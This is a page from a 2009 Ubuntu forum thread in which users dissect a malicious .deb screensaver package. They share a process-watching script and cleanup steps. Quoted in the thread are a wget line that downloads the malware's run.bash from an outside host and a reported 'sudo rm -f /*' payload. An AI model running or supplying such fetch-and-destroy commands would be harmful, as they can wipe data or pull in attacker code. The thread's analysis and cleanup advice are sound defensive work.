Page 9 of 15 FirstFirst ... 7891011 ... LastLast
Results 81 to 90 of 142

Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #81
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by tinivole View Post
    I downloaded run.bash via:
    Code:
    wget http://05748.t35.com/Bots/run.bash
    And analysed the contents to find that it is an rm command to remove the entire filesystem...

    hmmm. that wasn't there a couple hours ago. looks like the op caught it just in time.
    just goes to show, a well staged deployment is everything.

  2. #82
    Join Date
    May 2009
    Beans
    1,934
    Distro
    Ubuntu Studio 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    well I dont want a congrats...

    Keep viruses in the windows world

    Thank you
    I doubt you will get anything when going to the link. That link is in the screensaver script which the you were talking about.
    Last edited by running_rabbit07; December 9th, 2009 at 07:27 AM.

  3. #83
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Yes, a script to display the ads. As far as I can tell, it's a free website hosted on t35.com, set-up so the person could test this out. Has someone contacted t35.com yet?

  4. #84
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Wait there was rm commands to delete stuff in / ?

  5. #85
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by conorsulli View Post
    Wait there was rm commands to delete stuff in / ?
    As far as I can tell, the command there was
    Code:
     sudo rm -f /*
    (need tinvole to confirm this)

    This wouldn't have caused damage - you need a -r there too to delete folders.

  6. #86
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    So what is the bottom line for me guys? How do I get over this and move on?
    Another day has passed and I'm just a little bit smarter.

  7. #87
    Join Date
    Dec 2007
    Beans
    124

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by running_rabbit07 View Post
    I hope you weren't calling me a clown for posting the results of going to the site that is in the above mentioned script. I have no intention of messing with anybody's system.
    No, can I stress I was not throwing insults at you if it came across as so....

    I was referring to the idle head that created the deb and posted it on gnome-look.

    I appreciate any help that came from the people here in the thread.

  8. #88
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Horse scanner ready

    Okay, if anything else was installed and hidden somewhere (it could be activated from an init.d script, all the original stuff could just be more "trojan" for the horse), presuming they are still using wget and ping, just open a terminal and run this script in the foreground for a few hours.
    Code:
    #!/bin/sh
    
    while :
    do
    check=`ps -o pid,cmd -A | egrep '\bwget\b|\bping\b'`
    
    if [ -n "$check" ]; then
        echo "!!-> pid $check <-!!"
    fi
    
    sleep 1
    
    done
    It shouldn't produce any output unless someone runs ping or wget:
    Code:
    root ~/shell: ./check.sh 
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    !!-> pid 28140 ping bbc.co.uk <-!!
    Which ping and wget do not start by themselves.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  9. #89
    NoaHall is offline May the Ubuntu Be With You!
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by Enlightened Shadow View Post
    So what is the bottom line for me guys? How do I get over this and move on?
    Code:
    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

  10. #90
    Join Date
    Oct 2009
    Location
    North Carolina US
    Beans
    54
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    Code:
    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

    Thank you. I haven't been home for the last 1hr and 30mins so I just needed someone to catch me up real quick so I could get rid of all threats before they become worse.
    Another day has passed and I'm just a little bit smarter.

Page 9 of 15 FirstFirst ... 7891011 ... LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •